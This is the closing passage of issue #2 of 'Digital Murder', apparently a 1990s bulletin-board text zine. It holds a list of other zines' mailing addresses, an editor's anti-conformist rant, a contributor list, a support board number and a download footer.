    'zines with topics ranging from political corruption, anti-
    government action, and environmental news then check these
    phucking cool mags.  Write 'em for price info if not listed.

    Flipside  (punk rock/noise/industrial/etc..music)
    P.O. Box 363
    Whittier, CA  90608

    Little Free Press  (government views/utopian societys/etc)
    Rt. 1  Box 102
    Cushing, MN  56443

    Maximum Rock & Roll (punk/hardcore/etc..music)
    P.O. Box 288
    Berkeley, CA  94701

    File 13  ($2.00 per issue last time i checked)
    P.O. Box 175
    Concord, MA  01742
    ----------------------------------------------------------
    ----------------------------------------------------------








                                                                         18


    Maybe some of these will keep your brain clear but not washed
    like most in this country.  You know the ones. . . those that
    are insecure about their future.  Those are the people we all
    remember back in High School;  the guys and  girls  who  were
    alwayz pushing themselves into  the  system-  alwayz  pushing
    themselves into the clubs and cliques- pushing  their  future
    through a sieve, draining out all their unique qualities till
    all that's left is another person totally conditioned to be a
    corporate slave.  Think about this.  Think about and question
    everything.

    Thanks for reading and supporting Digital Murder.   Issue  #3
    will be out December 15th.  FEEL FREE to help out!  Don't let
    those fascist shits on Capital Hill fool  you  into  thinking
    that you can't still voice your opinion or share information!
    Call The Backdoor, leave me, Morpheus, feedback.  Send in  an
    article or just drop in and say what's on your mind.

    The 'zine should be better now that it'z getting more support
    as well as the fact that I've moved to the most  boring  city
    in the whole phucking world.  The most ''exciting'' thing  to
    do around here is this building that is the home of  a  movie
    theater that shows old movies, a  skating  rink  and  bowling
    alley for pre-teen preppies, and an arcade featuring billybob
    and his cousins playing pool for car titles while I waste  my
    money on one of the seven video  games  in  the  city's  only
    arcade.  At least the old city I lived in isn't too far  away
    from here.  So while you  are  walking  around  breathing  in
    America's cold, toxic, city air or feasting on the carcass of
    a dead turkey for thanksgiving, think of your editor  slaving
    over the keys to bring forth another edition of the  one  and
    only Digital Murder.

    Contributors:  Morpheus, Technysis, Chizz, Zapped, NeuronGod,
    Mystic Blade, and Digital Terrorist.

    Support Boards:  Backdoor (901)/386.6455

    Wanna be a support board?  Leave Morpheus feedback on Backdoor.
    

\n

UD#9: Digital Murder U/D
[X-Modem/UnltdBlk] UD:
Downloaded From P-80 International Information Systems 304-744-2253